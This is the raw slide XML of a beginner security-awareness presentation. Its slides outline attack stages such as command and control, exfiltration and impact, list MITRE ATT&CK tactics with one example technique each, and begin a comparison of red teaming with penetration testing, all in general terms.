          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Setting up communication channels to manage compromised systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Often involves encrypted or covert communication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Using an encrypted DNS tunnel for remote control.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3AC9ECE-F83D-B2A8-C2B5-3BE0B0EB53E1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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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364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0E7DEED-32CB-7E3F-3330-76FCCF98E1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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AEF11F6-99EE-1936-0F16-FDA22AC4EA4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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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470114B4-B421-A9D3-3207-17C49D4F5E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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Exfiltration: Sneaking Out the Backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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8470C61-0397-6766-CDCA-7191F83E3D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>The process of moving data out of the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Methods include covert file transfers and disguised network traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Uploading data to a cloud storage service without detection.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0561B3D-265C-9DF2-79E0-9B511D891CBB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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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6073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FA8306E-AD52-E8C5-FD82-CCBC3A3E62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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AF67998-5FEE-F254-F83A-5C9B4110DC3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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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92094D46-89DD-5063-569F-B748EEE56F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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Impact – Delivering the Final Blow</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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B2BE24D-575E-14D9-5F20-89F123EB3577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>The final act where attackers cause disruption or damage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Could involve ransomware, data destruction, or system shutdown.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Encrypting files and demanding a ransom, or deleting backups to halt operations.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4836BF7-26DB-A1D7-9649-39B45CE7A1B3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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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5859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4315D97-3E2B-1E9C-EE6F-1896ED892D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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEC7B24B-62E6-4D2B-F4DA-88EBCBF3E2B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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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C6C3117B-A179-EC29-C14C-9AC8290E29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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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6C03007-5413-55E4-C029-F95FA24FA2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="10195562" cy="32762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Inter"/>
              </a:rPr>
              <a:t>What Are Techniques?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>They explain how attackers carry out their plans—essentially, the “how” behind the attack.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Over 201 Methods:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>There are more than 200 ways attackers can work, and new methods are added over time.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59A2B9B0-E010-000A-1A9B-2BAD6A6573C1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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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6745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F10909-8DE4-919A-434B-448700D7F0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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4BB9D33-21F3-D655-8DCB-EB298190E4B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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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ED61C44B-BF74-9EB1-3F25-A5787A2BBE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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1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ATT&amp;CK Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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8A491D1-346E-D509-ECA8-5A0592ADEBDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="5731935" cy="50167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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Tactic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>                                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Technique</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Reconnaissance                       Active Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Resource Development          Develop Capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Initial Access                             Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Execution                                  Scheduled Task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Persistence                               Create Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Privilege Escalation                 Escape to Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Defense Evasion                      Masquerading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Credential Access                    Brute Force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Discovery 		    Account Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Lateral Movement 	    Internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Spearphishing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Collection 		    Email Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Command and Control 	    Encrypted Channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Exfiltration 		    Exfiltration over C2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Impact 			    Data Destruction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CE1F6A9-3E40-4053-82C1-D43C31AB9059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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9950155" y="6053252"/>
            <a:ext cx="1761829" cy="728134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A person in a hoodie typing on a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{608ED355-93B6-8A81-18E8-36E28E82A05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4652" y="1976334"/>
            <a:ext cx="4179150" cy="417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0264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2642C3-117B-FDF4-BADC-9D4A745740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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6225FD-02C3-BD3F-3553-4C4F828ECB1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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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9789D31C-0054-D5FA-3E7C-98EE78470A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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Sub-Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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0DAAC8F-8D7F-B6EB-D1E2-C90F246C5CA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="10195562" cy="18528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l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Inter"/>
              </a:rPr>
              <a:t>What Are Sub Techniques?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>They break down the exact steps attackers take.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Right now, there are 424 methods (and more can be added).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D461886-15F5-4E4D-D9C1-D4E3FAAE289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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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58556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13FF73-CA38-7142-923D-7B2A45B60C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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD9B3C12-F8E3-CAF0-A149-709E56326E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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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476A369D-FE26-B973-026F-1FCA4A781C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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1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Subtechniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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70A0881-4107-4848-02D7-C9005C9A6ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1363134"/>
            <a:ext cx="10195562" cy="18528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l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Inter"/>
              </a:rPr>
              <a:t>What Are Sub Techniques?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>They break down the exact steps attackers take.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Right now, there are 424 methods (and more can be added).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6D9B680-1202-E781-0CE5-AC7BD55D1241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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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0490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BA85FC-9F4A-3BE3-EB4D-1A0832F752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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA109EA7-0ACE-3CBB-3CE7-D93B06FAE9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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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A0F640BD-93D7-94B1-C4E4-6CECC40FBB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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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RED TEAMING vs. PENETRATION TESTING</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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53A3A0F-7C24-0805-6617-2B50ECF4D53A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1700661"/>
            <a:ext cx="9486899" cy="38533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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🔥 Fire Drill vs. Inspection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8FAFF"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Test everything vs. check specific locks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>🎭 Real-World Chaos vs. Checklists</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
